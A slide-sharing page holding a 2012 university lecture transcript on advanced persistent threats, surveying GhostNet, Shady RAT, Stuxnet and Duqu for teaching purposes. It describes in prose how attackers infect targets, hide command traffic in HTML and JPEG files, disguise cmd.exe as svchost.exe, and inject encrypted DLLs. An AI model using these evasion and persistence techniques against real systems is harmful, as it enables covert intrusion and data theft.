1 / 11

Advanced Persistent Threats

Advanced Persistent Threats. CS461/ECE422 Spring 2012. Traditional Malware. Infect as many machines as possible Non-discriminating Goal is the machine resources. Less the information on the machine Use CPU resources Sell DDoS abilities Sell SPAM abilities Use machines for storage

diallo
Download Presentation

Advanced Persistent Threats

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Advanced Persistent Threats CS461/ECE422 Spring 2012

  2. Traditional Malware • Infect as many machines as possible • Non-discriminating • Goal is the machine resources. • Less the information on the machine • Use CPU resources • Sell DDoS abilities • Sell SPAM abilities • Use machines for storage • Stash stolen or illicit information on infected machine • Use network resources • Launch attacks or indirect through infected machines • Even where information is the goal, the specific owner of the information is not important • Gather credit card numbers • Perform extra bank transactions

  3. Advanced Persistent Threat (APT) • Has been there all along. Just has gotten more attention recently • Attacker is concerned with the specific target • Discriminating, narrow, focused attack • E.g., attacker wants to find specific information from a specific organization • May perform some more generic infection techniques, but the ultimate goal is very specific

  4. Successful APT • Lower volume • Unlikely to be part of standard virus scanner/IDS signature base • Generally the ones that are discovered are not particularly interesting • Evolving • Perhaps changing on each campaign • Focused • Just being more secure than your neighbors may not be good enough

  5. Tibet Ghostnet • http://en.wikipedia.org/wiki/GhostNet • Discovered March 2009 • Infection initiated via targeted infected emails • Infected attachment installs Trojan • Trojan contacts control server and ways for commands • One command installed Gh0st Rat which allows complete control on windows system

  6. Shady RAT • RAT = Remote Access Trojan • Report released by McAffee in August 2011 • www.mcafee.com/us/resources/white.../wp-operation-shady-rat.pdf • Reviewed the logs of one CNC botnet staring from 2006 • The botnet infiltrated many government and commercial organizations • Claimed sophisticated attack and targeted information gathering • Concretely identified 71 infiltrated organizations

  7. How is the target computer infected? • Send emails to people at the target organization • Infected attachments, e.g. MS word, Excel, PDF, powerpoint • Victim opens infected attachment. Results extra code executing which installs a Trojan • Trojan attempts to contact some hard codes sites • Generally html or jpeg which don’t arouse much attention from the firewall or other network defenses • Commands are encrypted in the comments of the html file or embedding in the jpeg using steganographic techniques. • Example commands • Run: {URL/Filename} – Download and execute file • Sleep:{number} – Sleep for specified time • Info from Symantec review • http://www.symantec.com/connect/blogs/truth-behind-shady-rat

  8. Using the machine once it’s infected • Using the {IP Address}:{port} command the Trojan connects to the remote server • Copies cmd.exe to svchost.exe and launchs the new version of cmd shell to listen on the port • Lots of instances of svchost run on a windows machine • This gives the attacker almost complete freedom to launch their attack from the infected machine • Does not use very sophisticated techniques

  9. Stuxnet • Came to public attention June 2010 but in hindsight appeared in November 2008 • Symantec analysis http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_stuxnet_dossier.pdf • Truly more sophisticated • Replicates via removable drives (jumping the air gap) • Also leverages SMB and printer spooling vulnerabilities plus much more • Sophisticated binary hiding and execution • Targeting a specific industrial control system (a Siemens PLC). Ultimately rootkits that PLC. • Supposedly the code altered behavior of centrifuges in a subtle way. Enough to alter the results of the centrifuging, but not enough so the operator would notice right away.

  10. W32.Duqu • Probable evolution of the Stuxnet code base • Reports released around October 2011 • Symantec report http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet_research.pdf • Still figuring out the original infection vectors • One appears to be a zero-day MS doc issue http://www.symantec.com/connect/w32-duqu_status-updates_installer-zero-day-exploit • Infected execution starts through a registered device driver • Device driver loaded on system boot • Device driver is signed with a legitimately signed certificate, so it does not raise attention • The driver injects a main dll into services.exe • The main dll is encrypted on disk. The key is stored in the registry

  11. Duqu loading • Performs basic anti-debugging checks • Are debugging types of processes running? • Uninstall if it has been running for 36 days • The next phase is loaded from an encrypted resource in the main dll • The resource is decrypted into memory • The new DLL is injected into a standard process such as explorer.exe • The newly injected code is a payload loader • It gets information from CNC • It uses rootkit techniques to execute the payload bytes (load library) without ever writing the bytes to disk • Ultimately, it appears that the malware installs infostealing software • Appears to exchange data via information embedded in jpeg files.

More Related